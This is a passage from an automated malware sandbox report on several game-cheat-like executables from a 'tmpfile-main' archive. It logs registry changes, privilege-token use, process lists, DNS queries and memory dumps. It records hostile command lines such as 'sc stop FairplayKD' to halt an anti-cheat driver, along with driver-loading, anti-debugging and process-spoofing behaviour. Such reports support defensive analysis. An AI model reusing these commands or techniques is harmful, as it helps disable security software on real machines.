| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2TS | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%systemroot%\system32\wdc.dll,-10031 = "Monitor the usage and performance of the following resources in real time: CPU, Disk, Network and Memory." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\system32\mstsc.exe,-4001 = "Use your computer to connect to a computer that is located elsewhere and run programs or access files." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\GameInputSvc.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000d4d74ae9d444db01 | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\regedit.exe,-16 = "Registry Editor" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{C120DE80-FDE4-49F5-A713-E902EF062B8A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000009ed92be9d444db01 | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gpp | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpg\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\system32\MdSched.exe,-4002 = "Check your computer for memory problems." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\RecoveryDrive.exe,-500 = "Recovery Drive" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MOD | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\GameInputSvc.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000030ff51e9d444db01 | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-102 = "Microsoft Excel Template" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%systemroot%\system32\Filemgmt.dll,-602 = "Starts, stops, and configures Windows services." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\MdSched.exe,-4001 = "Windows Memory Diagnostic" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\SearchFilterHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2TS\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000074b135eed444db01 | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-121 = "Microsoft Word 97 - 2003 Template" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpe | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\system32\speech\speechux\sapi.cpl,-5556 = "Dictate text and control your computer by voice." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%CommonProgramFiles%\Microsoft Shared\Ink\mip.exe,-292 = "Math Input Panel" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2FB4720-F45F-4A3C-8CB2-2060E12425C3} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000091836ff0d444db01 | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@fxsresm.dll,-1132 = "Store in a folder" | C:\Windows\system32\fxssvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\Taskmgr.exe,-32420 = "Task Manager" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\GameInputSvc.exe | N/A |
| N/A | N/A | C:\Windows\System32\GameInputSvc.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\fxssvc.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\GameInputSvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\TieringEngineService.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\TieringEngineService.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\AgentService.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\alg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\alg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\alg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msdtc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msdtc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msdtc.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4588 wrote to memory of 1768 | N/A | C:\Windows\System32\GameInputSvc.exe | C:\Windows\System32\GameInputSvc.exe |
| PID 4588 wrote to memory of 1768 | N/A | C:\Windows\System32\GameInputSvc.exe | C:\Windows\System32\GameInputSvc.exe |
| PID 2216 wrote to memory of 4292 | N/A | C:\Windows\system32\SearchIndexer.exe | C:\Windows\system32\SearchProtocolHost.exe |
| PID 2216 wrote to memory of 4292 | N/A | C:\Windows\system32\SearchIndexer.exe | C:\Windows\system32\SearchProtocolHost.exe |
| PID 2216 wrote to memory of 4600 | N/A | C:\Windows\system32\SearchIndexer.exe | C:\Windows\system32\SearchFilterHost.exe |
| PID 2216 wrote to memory of 4600 | N/A | C:\Windows\system32\SearchIndexer.exe | C:\Windows\system32\SearchFilterHost.exe |
Uses Volume Shadow Copy service COM API
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | "C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe" |
| C:\Windows\System32\alg.exe | C:\Windows\System32\alg.exe |
| C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv |
| C:\Windows\system32\fxssvc.exe | C:\Windows\system32\fxssvc.exe |
| C:\Windows\System32\GameInputSvc.exe | C:\Windows\System32\GameInputSvc.exe |
| C:\Windows\System32\GameInputSvc.exe | "C:\Windows\System32\GameInputSvc.exe" Global\GameInputSession_1 |
| C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe" |
| C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe" |
| C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" |
| C:\Windows\System32\msdtc.exe | C:\Windows\System32\msdtc.exe |
| \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | "c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE" |
| C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe |
| C:\Windows\SysWow64\perfhost.exe | C:\Windows\SysWow64\perfhost.exe |
| C:\Windows\system32\locator.exe | C:\Windows\system32\locator.exe |
| C:\Windows\System32\SensorDataService.exe | C:\Windows\System32\SensorDataService.exe |
| C:\Windows\System32\snmptrap.exe | C:\Windows\System32\snmptrap.exe |
| C:\Windows\system32\spectrum.exe | C:\Windows\system32\spectrum.exe |
| C:\Windows\System32\OpenSSH\ssh-agent.exe | C:\Windows\System32\OpenSSH\ssh-agent.exe |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc |
| C:\Windows\system32\TieringEngineService.exe | C:\Windows\system32\TieringEngineService.exe |
| C:\Windows\system32\AgentService.exe | C:\Windows\system32\AgentService.exe |
| C:\Windows\System32\vds.exe | C:\Windows\System32\vds.exe |
| C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe |
| C:\Windows\system32\wbengine.exe | "C:\Windows\system32\wbengine.exe" |
| C:\Windows\system32\wbem\WmiApSrv.exe | C:\Windows\system32\wbem\WmiApSrv.exe |
| C:\Windows\system32\SearchIndexer.exe | C:\Windows\system32\SearchIndexer.exe /Embedding |
| C:\Windows\system32\SearchProtocolHost.exe | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" |
| C:\Windows\system32\SearchFilterHost.exe | "C:\Windows\system32\SearchFilterHost.exe" 0 936 940 948 8192 944 916 |
| C:\Windows\System32\msdtc.exe | C:\Windows\System32\msdtc.exe |
| C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe |
| C:\Windows\system32\spectrum.exe | C:\Windows\system32\spectrum.exe |
| C:\Windows\system32\SearchIndexer.exe | C:\Windows\system32\SearchIndexer.exe /Embedding |
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
95s
Max time network
162s
Command Line
Signatures
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\YuYWieTYcCRlVDzFkxU\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\YuYWieTYcCRlVDzFkxU" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
Files
memory/3356-0-0x00007FF64FB6D000-0x00007FF64FDF6000-memory.dmp
memory/3356-1-0x00007FFEAC830000-0x00007FFEAC832000-memory.dmp
memory/3356-2-0x00007FF64FA40000-0x00007FF6502DF000-memory.dmp
memory/3356-7-0x00007FF64FB6D000-0x00007FF64FDF6000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
91s
Max time network
151s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/5020-0-0x00007FF7405B9000-0x00007FF740923000-memory.dmp
memory/5020-1-0x00007FF837270000-0x00007FF837272000-memory.dmp
memory/5020-2-0x00007FF837280000-0x00007FF837282000-memory.dmp
memory/5020-4-0x00007FF7405B0000-0x00007FF740E63000-memory.dmp
memory/5020-5-0x00007FF7405B9000-0x00007FF740923000-memory.dmp
memory/5020-6-0x00007FF7405B0000-0x00007FF740E63000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
165s
Command Line
Signatures
Stops running service(s)
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD > nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD1 > nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD2 > nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD3 > nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
Files
memory/1204-1-0x00000000016D0000-0x00000000016D1000-memory.dmp
memory/1204-0-0x000000000063A000-0x0000000000BB1000-memory.dmp
memory/1204-2-0x0000000000400000-0x000000000168B000-memory.dmp
memory/1204-4-0x0000000000400000-0x000000000168B000-memory.dmp
memory/1204-5-0x000000000063A000-0x0000000000BB1000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
156s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1300 created 628 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
